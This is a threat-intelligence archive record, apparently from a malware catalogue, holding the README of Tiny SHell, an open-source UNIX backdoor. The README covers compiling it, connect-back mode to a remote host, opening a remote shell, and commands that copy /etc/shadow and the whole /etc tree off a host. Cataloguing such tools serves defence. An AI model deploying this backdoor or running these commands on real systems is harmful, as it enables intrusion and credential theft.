{
	"id": "eccbae48-e729-42cc-af39-e1ceab544a98",
	"created_at": "2026-04-06T00:18:47.114155Z",
	"updated_at": "2026-04-10T03:21:31.274091Z",
	"deleted_at": null,
	"sha1_hash": "3fe4a53edb83cb4e6012d33859b4bffc580eacd7",
	"title": "GitHub - creaktive/tsh: Tiny SHell - An open-source UNIX backdoor (I'm not the author!)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 36878,
	"plain_text": "GitHub - creaktive/tsh: Tiny SHell - An open-source UNIX\r\nbackdoor (I'm not the author!)\r\nBy creaktive\r\nArchived: 2026-04-02 10:37:30 UTC\r\n Tiny SHell - An open-source UNIX backdoor\r\n * Before compiling Tiny SHell\r\n 1. First of all, you should setup your secret key, which\r\n is located in tsh.h; the key can be of any length (use\r\n at least 12 characters for better security).\r\n 2. It is advised to change SERVER_PORT, the port on which\r\n the server will be listening for incoming connections.\r\n 3. You may want to start tshd in \"connect-back\" mode if\r\n it runs on on a firewalled box; simply uncomment and\r\n modify CONNECT_BACK_HOST in tsh.h.\r\n * Compiling Tiny SHell\r\n Run \"make \u003csystem\u003e\", where \u003csystem\u003e can be any one of these:\r\n linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf\r\n * How to use the server\r\n It can be useful to set $HOME and the file creation mask\r\n before starting the server:\r\n % umask 077; HOME=/var/tmp ./tshd\r\n * How to use the client\r\n Make sure tshd is running on the remote host. You can:\r\n - start a shell:\r\n ./tsh \u003chostname\u003e\r\n - execute a command:\r\nhttps://github.com/creaktive/tsh\r\nPage 1 of 2\n\n./tsh \u003chostname\u003e \"uname -a\"\r\n - transfer files:\r\n ./tsh \u003chostname\u003e get /etc/shadow .\r\n ./tsh \u003chostname\u003e put vmlinuz /boot\r\n Note: if the server runs in connect-back mode, replace\r\n the remote machine hostname with \"cb\".\r\n * About multiple file transfers\r\n At the moment, Tiny SHell does not support scp-like multiple\r\n and/or recursive file transfers. You can work around this bug\r\n by simply making a tar archive and transferring it. Example:\r\n ./tsh host \"stty raw; tar -cf - /etc 2\u003e/dev/null\" | tar -xvf -\r\n * About terminal modes\r\n On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C\r\n and other control keys do not work correctly. Fix it with:\r\n % stty intr \"^C\" erase \"^H\" eof \"^D\" susp \"^Z\" kill \"^U\"\r\n * About security\r\n Please remember that the secret key is stored in clear inside\r\n both tsh and tshd executables; therefore you should make sure\r\n that no one except you has read access to these two files.\r\n However, you may choose not to store the real (valid) key in\r\n the client, which will then ask for a password when it starts.\r\nSource: https://github.com/creaktive/tsh\r\nhttps://github.com/creaktive/tsh\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://github.com/creaktive/tsh"
	],
	"report_names": [
		"tsh"
	],
	"threat_actors": [],
	"ts_created_at": 1775434727,
	"ts_updated_at": 1775791291,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3fe4a53edb83cb4e6012d33859b4bffc580eacd7.pdf",
		"text": "https://archive.orkl.eu/3fe4a53edb83cb4e6012d33859b4bffc580eacd7.txt",
		"img": "https://archive.orkl.eu/3fe4a53edb83cb4e6012d33859b4bffc580eacd7.jpg"
	}
}